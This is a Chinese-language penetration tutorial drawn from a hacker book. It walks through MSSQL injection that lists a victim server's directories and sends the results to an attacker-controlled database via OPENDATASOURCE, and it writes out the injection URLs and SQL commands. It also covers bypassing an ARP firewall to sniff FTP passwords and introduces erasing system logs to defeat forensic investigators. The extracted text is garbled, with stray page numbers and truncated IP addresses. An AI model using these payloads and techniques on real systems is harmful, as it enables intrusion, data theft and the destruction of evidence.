網(wǎng)絡(luò)攻防演練文檔設(shè)計

1、網(wǎng)絡(luò)攻防演練文檔設(shè)計目錄文獻參考：<<暗戰(zhàn)亮劍黑客滲透與防御全程實錄>>1.1 Web應(yīng)用程序滲透前的信息收集21.1.1了解目標(biāo)主機和網(wǎng)絡(luò)的一些基本的安全信息21.1.2確定目標(biāo)的域名和相關(guān)的網(wǎng)絡(luò)信息21.1.3目標(biāo)主機掃描測試31.2漏洞利用代碼的收集31.2.1腳本漏洞利用代碼的收集31.2.2 操作系統(tǒng)漏洞利用代碼的獲取41.3 MSSQL下的高級反彈注射技術(shù)41.3.1opendatasource函數(shù)語法51.3.2搭建本地MSSQL攻防環(huán)境61.3.3反彈注射之獲取機密信息61.4黑客致命絕招之突破ARP防火墻91.4.1Cain配合Ncpharp挑戰(zhàn)Ant

2、iarp防火墻91.5黑客反取證之痕跡擦除111.5.1操作系統(tǒng)常見日志111.5.2系統(tǒng)日志的擦除14 1.1 Web應(yīng)用程序滲透前的信息收集 腳本滲透是如今比較流行的技術(shù)，運用該技術(shù)可輕松擊潰一個Web站點。不同安全級別的站點，滲透的方式也是不一樣的，其中涉及許多高級技巧。這些技巧都是黑客們的看家本領(lǐng)，一般是不愿意外傳的。這里筆者向讀者朋友揭秘高級腳本滲透技術(shù)的秘籍，重點學(xué)習(xí)高手們的滲透思路。1.1.1了解目標(biāo)主機和網(wǎng)絡(luò)的一些基本的安全信息踩點可以了解目標(biāo)主機和網(wǎng)絡(luò)的一些基本的安全信息，主要有：（1）.管理員聯(lián)系信息，電話號，傳真號,QQ號,電子郵件等。（2）.IP地址范圍（3）.DNS服

3、務(wù)器（4）.郵件服務(wù)器1.1.2確定目標(biāo)的域名和相關(guān)的網(wǎng)絡(luò)信息Whois查詢，通過Whois數(shù)據(jù)庫查詢可以得到以下的信息：（1）.注冊機構(gòu)：顯示相關(guān)的注冊信息和相關(guān)的Whois服務(wù)器（2）.機構(gòu)本身：顯示與某個特定機構(gòu)相關(guān)的所有信息（3）.域名：顯示與某個特定域名相關(guān)的所有信息（4）.網(wǎng)絡(luò)：顯示與某個特定網(wǎng)絡(luò)或單個IP地址相關(guān)的所有信息（5）.聯(lián)系點:顯示與某位特定人員相關(guān)的所有信息1.1.3目標(biāo)主機掃描測試透過掃描可以獲取目標(biāo)主機的安全弱點以及漏洞信息，主要有：（1）.端口掃描，透過端口開放情況可大致判斷提供的服務(wù)信息。（2）.漏洞掃描，可以獲取目標(biāo)主機存在的漏洞，比如溢出漏洞。（3）.密碼

4、破解，掃描工具可輕松的檢測出當(dāng)前系統(tǒng)的弱口令等信息。（4）.軟件漏洞，通過掃描也可發(fā)現(xiàn)一些軟件的漏洞，利用第三方軟件漏洞實現(xiàn)系統(tǒng)攻擊是目前比較流行的攻擊手法。1.2漏洞利用代碼的收集1.2.1腳本漏洞利用代碼的收集在國內(nèi)很多公司,企業(yè),教育,政府部門的網(wǎng)站程序都是使用網(wǎng)上公開的商業(yè)程序或者免費整站程序，一旦這些整站程序出現(xiàn)安全問題，那么直接導(dǎo)致使用者的Web系統(tǒng)被攻擊或者被滲透。雖然利用現(xiàn)成的整站程序構(gòu)建網(wǎng)站系統(tǒng)成本較低，但是安全風(fēng)險是無法回避的。在Web滲透中，黑客們常常遇到各種各樣的整站程序，不同的整站程序會出現(xiàn)不同的安全漏洞，掌握這些安全漏洞是很有必要的。在滲透需要的時候，這些漏洞就會起

5、到很大的作用。根據(jù)筆者的滲透經(jīng)驗來談，收集一些Web程序敏感路徑,源碼,漏洞利用工具,0DAY程序等是非常重要的，不僅可以充實你的“漏洞庫”，而且可以對這些漏洞原理進行分析，總結(jié)其中的精髓，做到融會貫通。這里是筆者近期收集的一些腳本漏洞利用程序，如圖1-1所示圖1-1 漏洞利用程序同時國內(nèi)比較出名的腳本程序漏洞公布站點Sebug，收集了海量國內(nèi)外整站程序的漏洞信息，國內(nèi)大多數(shù)整站程序漏洞信息在這里基本都能找到。其官方地址為： 如圖1-2所示圖1-2 sebug網(wǎng)站1.2.2 操作系統(tǒng)漏洞利用代碼的獲取當(dāng)然腳本漏洞利用程序只對存在腳本漏洞的Web站點構(gòu)成直接威脅，而對于滲透操作系統(tǒng)則需要更為高級

6、的漏洞利用程序。對操作系統(tǒng)而言，最為嚴重的莫過于遠程溢出漏洞了，收集此類漏洞利用程序同樣也變得異常重要。一般來說國外黑客站點會第一時間發(fā)布此類漏洞信息以及漏洞利用程序，關(guān)于獲取這類漏洞信息可查看如下站點：/其中黑客站點milw0rm通常是國外0DAY程序的第一發(fā)布站點，如圖1-3所示。圖1-3 miw0rm官網(wǎng)1.3 MSSQL下的高級反彈注射技術(shù)MSSQL注射攻擊是最為復(fù)雜的數(shù)據(jù)庫攻擊技術(shù)，由于該數(shù)據(jù)庫功能十分強大，存儲過程以及函數(shù)語句十分豐富，這些靈活的語句造就了新穎獨特的攻擊思路。黑客們深入鉆研MSSQL數(shù)據(jù)庫的精髓，將數(shù)據(jù)庫攻擊發(fā)揮得淋漓盡致。本

7、節(jié)筆者將繼續(xù)給讀者朋友講解MSSQL數(shù)據(jù)庫的一些高級攻擊技術(shù)，將SQL數(shù)據(jù)庫滲透發(fā)揮到極致。在嘗試進行注射攻擊的時候，難免會遇到會這樣或者那樣的問題。比如明明是SQL的注射點卻無法進行注射,注射工具猜解的速度異常緩慢,錯誤提示信息關(guān)閉,無法返回注射結(jié)果等，這些都是在注射攻擊中常常遇到的問題。為了解決以上這些疑難雜癥，比較好的解決方法就是使用反彈注射技術(shù)，而反彈注射技術(shù)則需要依靠opendatasource函數(shù)支持。1.3.1opendatasource函數(shù)語法 學(xué)習(xí)任何技術(shù)，了解它的原理是非常重要的。只要把原理弄明白了，才能更好的研究和利用它。OPENDATASOURCE 函數(shù)可以在能夠使用鏈

8、接服務(wù)器名的相同 Transact-SQL 語法位置中使用。因此，就可以將 OPENDATASOURCE 用作四部分名稱的第一部分，該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語句中的表或視圖的名稱；或者指的是 EXECUTE 語句中的遠程存儲過程。當(dāng)執(zhí)行遠程存儲過程時，OPENDATASOURCE 應(yīng)該指的是另一個 SQL Server。OPENDATASOURCE 不接受參數(shù)變量。與 OPENROWSET 函數(shù)類似，OPENDATASOURCE 應(yīng)該只引用那些不經(jīng)常訪問的 OLE DB 數(shù)據(jù)源。對于訪問次數(shù)稍多的任何數(shù)據(jù)源，請為它們定義鏈接的服務(wù)器。無論 OP

9、ENDATASOURCE 還是 OPENROWSET 都不能提供鏈接的服務(wù)器定義的全部功能，例如，安全管理以及查詢目錄信息的能力。每次調(diào)用 OPENDATASOURCE 時，都必須提供所有的連接信息（包括密碼）。OPENDATASOURCE函數(shù)的語法參數(shù)如下：OPENDATASOURCE函數(shù)語法：OPENDATASOURCE ( provider_name, init_string )參數(shù)provider_name注冊為用于訪問數(shù)據(jù)源的 OLE DB 提供程序的 PROGID 的名稱。provider_name 的數(shù)據(jù)類型為 char，沒有默認值。init_string連接字符串，這些字符串將

10、要傳遞給目標(biāo)提供程序的 IDataInitialize 接口。提供程序字符串語法是以關(guān)鍵字值對為基礎(chǔ)的，這些關(guān)鍵字值對由分號隔開，例如："keyword1=value; keyword2=value."下邊列出 init_string 參數(shù)中最常用的關(guān)鍵字：關(guān)鍵字 OLE DB 屬性 有效值和描述 數(shù)據(jù)源 DBPROP_INIT_DATASOURCE 要連接的數(shù)據(jù)源的名稱。不同的提供程序用不同的方法對此進行解釋。對于 SQL Server OLE DB 提供程序來說，這會指明服務(wù)器的名稱。對于 Jet OLE DB 提供程序來說，這會指明 .mdb 文件或 .xls 文件的

11、完整路徑。 位置 DBPROP_INIT_LOCATION 要連接的數(shù)據(jù)庫的位置。 擴展屬性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的連接字符串。 連接超時 DBPROP_INIT_TIMEOUT 超時值，在該超時值后，連接嘗試將失敗。 用戶 ID DBPROP_AUTH_USERID 用于該連接的用戶 ID。 密碼 DBPROP_AUTH_PASSWORD 用于該連接的密碼。 目錄 DBPROP_INIT_CATALOG 連接到數(shù)據(jù)源時的初始或默認的目錄名稱。關(guān)于OPENDATASOURCE函數(shù)更加詳細的信息，請參考“SQL SERVER聯(lián)機叢書”。為了比較形象的

12、說明以上函數(shù)的用法，這里給出一個示例。該示例用于訪問來自某個表的數(shù)據(jù)，該表在 SQL Server 的另一個實例中。SELECT *FROM OPENDATASOURCE( 'SQLOLEDB', 'Data Source=ServerName;User ID=MyUID;Password=MyPass' ).Northwind.dbo.Categories為了便于讀者朋友理解OPENDATASOURCE函數(shù)的功能，筆者使用較為通俗的語言來說明：“使用OPENDATASOURCE函數(shù)將當(dāng)前數(shù)據(jù)庫中查詢的結(jié)果發(fā)送到另一數(shù)據(jù)庫服務(wù)器中”。這樣應(yīng)該比較容易理解。1.3

13、.2搭建本地MSSQL攻防環(huán)境 由于國家法律的要求，本節(jié)內(nèi)容將采用虛擬機本地模擬滲透環(huán)境進行演示（注意：本地模擬和實際操作步驟完全一樣）。本地服務(wù)器版本均使用WindowS 2003 SP2，除了構(gòu)造帶注射漏洞的web服務(wù)器外，另外還需要在一主機上安裝SQL server2000數(shù)據(jù)庫環(huán)境。具體環(huán)境如下：漏洞主機環(huán)境：WindowS 2003 SP2+IIS6.0+ASP+ SQL server2000漏洞主機IP地址：08攻擊者主機環(huán)境：WindowS 2003 SP2+ SQL server2000攻擊者主機IP地址：03關(guān)于如何構(gòu)造有漏洞的注射

14、環(huán)境，已經(jīng)做過詳細介紹，不熟悉的朋友可以參考注射點偽造滲透一節(jié)的內(nèi)容。筆者構(gòu)造的注射鏈接如下：Http:/ 08/news.asp?id=10 以上漏洞鏈接采用DB_OWNER權(quán)限賬戶連接數(shù)據(jù)庫。1.3.3反彈注射之獲取機密信息 在MSSQL數(shù)據(jù)庫的滲透中，若想快速獲得webshell，采用差異備份的方式無疑是最快的，而如何獲取Web絕對路徑是一個關(guān)鍵，也是一個難點。對于獲取Web絕對路徑，已經(jīng)介紹過很多種方法。在這里筆者將補充一種使用反彈技術(shù)獲得絕對路徑的方法。1.首先應(yīng)該在攻擊者主機的SQL server 2000中建立一個具有管理權(quán)限的數(shù)據(jù)庫賬戶，具體命令如下：ex

15、ec master.dbo.sp_addlogin h4ck,h4ck;-exec master.dbo.sp_addsrvrolemember h4ck,sysadmin;-其中添加的用戶名為h4ck，密碼為h4ck。以上語句請在查詢分析器中執(zhí)行，如圖1-4所示圖1-4 執(zhí)行添加用戶命令2.使用建立的SQL賬戶登陸數(shù)據(jù)庫，這里使用查詢分析器進行連接。利用SQL語句建立一個數(shù)據(jù)庫以及表和字段等。具體命令如下：create database test-use test create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarc

16、har(255),num3 nvarchar(255)其中建立一個名叫test的庫，在test庫下建立temp表以及id,num1, num2, num3等字段用于存放數(shù)據(jù)。查詢分析器中執(zhí)行語句，如圖1-5所示圖1-5 創(chuàng)建數(shù)據(jù)庫表操作3.現(xiàn)在將視線轉(zhuǎn)移到注射點（漏洞主機）上來，同樣使用SQL語句在注射點上建立一個與攻擊者數(shù)據(jù)庫中temp表一模一樣的表段，以便稍后存放數(shù)據(jù)。在注射點執(zhí)行的命令如下:Http:/08/news.asp?id=10'create table temp(id nvarchar(255),num1 nvarchar(255),num2 nv

17、archar(255),num3 nvarchar(255)-由于我們是本地測試，可直接在漏洞主機上使用查詢分析器執(zhí)行。語句如下:create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)-如圖1-6所示圖1-6 創(chuàng)建temp表以下進行的這二步非常關(guān)鍵，第一步將在漏洞主機進行列目錄操作。在注射點執(zhí)行如下命令：Http:/08/news.asp?id=10'insert into temp(id,num1,num2) exec master.d

18、bo.xp_dirtree 'c:',1,1使用xp_dirtree過程遍歷c盤下的目錄以及文件名，最后將結(jié)果插入到temp表中。這里我們使用查詢分析器進行執(zhí)行，執(zhí)行語句如下：insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'c:',1,1如圖1-7所示圖1-7 執(zhí)行語句現(xiàn)在該進行第二步了，這一步尤為關(guān)鍵。利用OPENDATASOURCE函數(shù)將temp表中存放的數(shù)據(jù)發(fā)送至遠程數(shù)據(jù)庫中，也就是發(fā)送到攻擊者構(gòu)造的數(shù)據(jù)庫中。在注射點執(zhí)行如下語句：Http:/08/news.asp

19、?id=10' insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo.temp select * from temp-若在查詢分析器中，可執(zhí)行如下語句：insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo

20、.temp select * from temp其中03為攻擊者數(shù)據(jù)庫服務(wù)器地址，1433為數(shù)據(jù)庫默認端口，數(shù)據(jù)庫用戶名為h4ck,密碼為h4ck,庫名為test,要發(fā)送的內(nèi)容為temp表中的數(shù)據(jù)。如圖1-8所示圖1-8 發(fā)送temp表數(shù)據(jù)4.數(shù)據(jù)成功發(fā)送后，我們需要查看本地數(shù)據(jù)庫中的temp表是否接收到了數(shù)據(jù)。在查詢分析器中執(zhí)行如下語句：Select * from temp -顯示temp表中所有的數(shù)據(jù)信息成功得到數(shù)據(jù)，如圖1-9所示圖1-9 得到機密數(shù)據(jù)通過以上的反復(fù)操作可找到Web的絕對路徑，記得在操作之前先清空temp表中的數(shù)據(jù)。1.4黑客致命絕招之突破ARP防火

21、墻內(nèi)網(wǎng)安全問題是一個極為嚴峻的問題，滲透者的各類攻擊技法層出不窮，難以防范，黑客時刻對企業(yè)網(wǎng)絡(luò)安全進行嚴峻的考驗。隨著Arp病毒的大規(guī)模爆發(fā)至今，企業(yè)一直飽受著Arp病毒的無情摧殘，所以為了加固局域網(wǎng)安全。企業(yè)都會選擇一些ARP防火墻作為自己的防護遁甲，經(jīng)過這樣簡單的安全加固，能夠防御大多數(shù)的ARP攻擊，防御效率明顯提高。但是網(wǎng)絡(luò)攻擊與安全防御都是對立發(fā)展的，相互推動。網(wǎng)絡(luò)沒有絕對的安全，黑客們已經(jīng)找到如何突破ARP防火墻的高級技術(shù)了，這一高級技術(shù)使得ARP防火墻形同虛設(shè)。下面筆者以實例的方式詳細講解如何在內(nèi)網(wǎng)滲透中對ARP防火墻的突破。1.4.1Cain配合Ncpharp挑戰(zhàn)Antiarp防

22、火墻對于滲透軟件軟件防火墻，其實可以通過增加ARP包的發(fā)送速度，數(shù)據(jù)包的發(fā)送速度一定要比arp防火墻的速度快，告訴網(wǎng)關(guān)攻擊者是被欺騙的主機ip地址和Mac地址，由于特定發(fā)包工具的速度比arp防火墻快，網(wǎng)關(guān)應(yīng)對攻擊者的響應(yīng)包要多一些，這樣自然就把我當(dāng)成被欺騙的主機了。對于特定發(fā)包工具，筆者建議使用NCPH工作室出品的【ncpharp】。關(guān)于測試的環(huán)境，這里可以沿用前面配置的環(huán)境。首先開啟Antiarp防火墻，將【防御狀態(tài)】調(diào)整至【警戒-待命】。如圖1-10所示圖1-10將【防御狀態(tài)】調(diào)整至【警戒-待命】使用Cain對目標(biāo)主機06進行ARP嗅探測試，如圖1-11所示圖1-11

23、 ARP嗅探測試本地使用賬戶以及密碼成功登陸FTP服務(wù)器，查看Antiarp防火墻狀態(tài)。發(fā)現(xiàn)已經(jīng)攔截到了多次ARP攻擊。如圖1-12所示圖1-12 攔截到攻擊數(shù)據(jù)包查看CAIN嗅探狀態(tài)，結(jié)果沒有嗅探到登陸的FTP密碼。如圖1-13所示圖1-13 無任何嗅探數(shù)據(jù)要想成功ARP嗅探必須配合一款特定的發(fā)包工具，由于特定工具發(fā)包速度較快，筆者建議單獨用一臺計算機運行發(fā)包工具。在使用發(fā)包工具之前，需要配置一些基本信息。所需基本信息如下：網(wǎng)關(guān)ip地址以及MAC地址：00-25-86-3d-9b-96目標(biāo)主機ip地址以及MAC地址：0600-0C-29-54-7E

24、-BB選擇發(fā)包的網(wǎng)卡【Ncpharp】在使用前請確保安裝了【W(wǎng)inPcap】軟件，否則無法運行?！綨cpharp】基本配置情況，如圖1-14所示圖1-14 【Ncpharp】基本配置現(xiàn)在開啟Cain對目標(biāo)進行ARP嗅探測試，發(fā)現(xiàn)能夠成功嗅探到FTP密碼。如圖1-15所示圖1-15 嗅探到FTP明文數(shù)據(jù)包1.5黑客反取證之痕跡擦除一個成功的滲透者不僅具有高超的入侵技術(shù),而且還需要具有良好的反偵察意識，在完成對特定目標(biāo)的滲透后能做到全身而退，不留下任何痕跡，做到“來無影，去無蹤”。 同時在撤退的過程中需要做大量的后期工作，清理掉在系統(tǒng)中所留下的一切痕跡，如果這個過程按照技術(shù)分類來劃分的話，它屬于計

25、算機反取證技術(shù)。計算機反取證就是刪除或者隱藏入侵證據(jù)使取證工作無效。目前的計算機反取證技術(shù)主要有數(shù)據(jù)擦除、數(shù)據(jù)隱藏、數(shù)據(jù)加密等。數(shù)據(jù)擦除是最有效的反取證方法，它是指清除所有可能的證據(jù)（包括索引節(jié)點、目錄文件和數(shù)據(jù)塊中的原始數(shù)據(jù)等），原始數(shù)據(jù)不存在了，取證工作自然無法進行，嚴重阻礙網(wǎng)絡(luò)警察的犯罪取證。同時對于計算機取證人員來說，研究反取證技術(shù)有特別的意義，不僅可以了解入侵者有哪些常用手段用來掩蓋甚至擦除入侵痕跡，而且可以在這些手段的基礎(chǔ)上，開發(fā)出更加有效、實用、針對性極強的計算機取證工具。1.5.1操作系統(tǒng)常見日志 日志文件是操作系統(tǒng)比較特別的文件，默默地記錄著系統(tǒng)發(fā)生的一切事件。這些普通的日志

26、文件平常毫不起眼，顯得微不足道。但是一旦發(fā)生安全事件，這些日志就成了最寶貴的數(shù)據(jù)，計算機取證人員會提取其中的關(guān)鍵日志進行分析，分析攻擊者在系統(tǒng)中進行的各項操作，最后將這些信息整理出來成為控告攻擊者最有說服力的犯罪證據(jù)。由此可以看出日志在計算機安全中顯示了無可替代的作用。如果要擦除這些痕跡，攻擊者必須熟悉操作系統(tǒng)中的日志相關(guān)的知識。1. 系統(tǒng)自帶日志系統(tǒng)自帶日志也是非常重要的日志，計算機取證人員通常會從這里下手提取一些數(shù)據(jù)。系統(tǒng)自帶日志分為三類日志，具體如下:應(yīng)用程序日志：記錄了重要的應(yīng)用程序產(chǎn)生的錯誤和成功信息。安全日志：主要記錄著win2k操作系統(tǒng)的組件所產(chǎn)生的日志。系統(tǒng)日志：主要記錄審核策

27、略的日志。關(guān)于如何查看系統(tǒng)日志，可依次作如下操作：“開始-設(shè)置控制面板-管理工具-事件查看器”。如圖1-16所示圖1-16事件查看器比如我們想查看是否被非法攻擊者遠程登陸過系統(tǒng)，可在事件查看器（本地）列表中選擇“安全性” ，系統(tǒng)就會詳細顯示所有的登陸事件。如圖1-17所示圖1-17 詳細顯示所有的登陸事件可以根據(jù)時間或者登陸用戶來判斷用戶登陸的事件，事件中顯示了一個名叫hacker$的用戶嘗試登陸過系統(tǒng)，有經(jīng)驗的管理一看就知道有貓膩。選擇此賬戶，右鍵選擇“屬性”可查看更多關(guān)于此賬戶的信息。如圖1-18所示圖1-18 查看更多關(guān)于此賬戶的信息事件詳細信息顯示：“該用戶已經(jīng)成功登陸，并且登陸服務(wù)器

28、所使用的IP地址為04。”這可以確定系統(tǒng)被入侵了，而且知道攻擊者的IP地址，如果攻擊者使用的真實的IP地址的話，那么他很危險，因為他忽略了系統(tǒng)日志對他構(gòu)成的威脅。2. 服務(wù)器日志除了以上系統(tǒng)自帶的基本日志外，服務(wù)器日志也是相當(dāng)?shù)闹匾?，其中詳細記錄了網(wǎng)絡(luò)用戶對服務(wù)器資源的訪問事件。服務(wù)器日志主要分為三類日志，具體如下:IIS日志：用于記錄網(wǎng)絡(luò)用戶活動的細節(jié)信息。FTP日志：用于記錄著所有用戶的訪問信息。DNS日志：用于記錄DNS活動相關(guān)的事件信息。 目前網(wǎng)絡(luò)上普遍使用微軟的IIS作為網(wǎng)站的服務(wù)器，通常Web服務(wù)器最容易受到腳本黑客們的襲擊，IIS日志顯得格外重要，其中詳細記

29、錄了網(wǎng)絡(luò)用戶的活動信息。一般網(wǎng)站被黑客入侵，可通過分析IIS日志，找出攻擊者的IP地址。關(guān)于如何查看IIS日志，可依次作如下操作：開始-設(shè)置控制面板-管理工具-Internet 信息服務(wù)(IIS)管理器-網(wǎng)站屬性-啟用日志記錄-屬性 如圖1-19所示 圖1-19 日志記錄屬性其中包含了日志的記錄任務(wù)和日志的存放路徑，打開該路徑下的W3SVC1目錄，可看到IIS相關(guān)的日志信息。其中日志默認按天進行記錄的，比如我們要查看今天的日志，可直接雙擊日志文件“ex090711.log”（注意：今天是2009年7月11日），日志記錄了詳細的訪問信息。如圖1-20所示圖1-20日志記錄了詳細的訪問信息由圖1-

30、20可知一陌生IP為17的用戶向服務(wù)器發(fā)送過大量的請求，其中請求的頁面都是網(wǎng)站的敏感路徑，而且發(fā)送的請求速度非?？?，手工是無法達到這樣的速度，筆者可以斷定攻擊者使用的黑客掃描器進行探測的。由以上信息可以判斷服務(wù)器在今天曾遭受過黑客的攻擊。如果沒有IIS日志記錄，取證人員很難判斷攻擊者所處的位置。對于FTP日志和DNS日志的查看都是大同小異的，這里不再介紹。3. 系統(tǒng)防火墻日志通常防火墻是攔截外邊攻擊的第一道屏障，防火墻不僅可以阻擋攻擊，而且對外部計算機嘗試攻擊的事件會詳細記錄在案，此工作通常交給日志來做，由此可見日志同樣扮演了相當(dāng)重要的作用。如何查看防火墻日志，可依次作如下操作：網(wǎng)上鄰居-屬性-更改WindowS防火墻設(shè)置-選擇“高級”選項卡-安全日志記錄-設(shè)置 如圖1-21所示圖1-21 日志設(shè)置記錄選項中記錄被丟棄的數(shù)據(jù)包和成功的連接的數(shù)據(jù)包，以及防火墻日志的存放路徑和文件大小限制等信息。防火墻安全日志使用的格式為W3C擴展日志文件格式，可直接使用記事本打開。如圖1-22所示圖1-22 打開防火墻日志文件一般防火墻的日志容量比較大，筆者建議使用專業(yè)的日志分析軟件進行分析。4. 系統(tǒng)終端登陸日志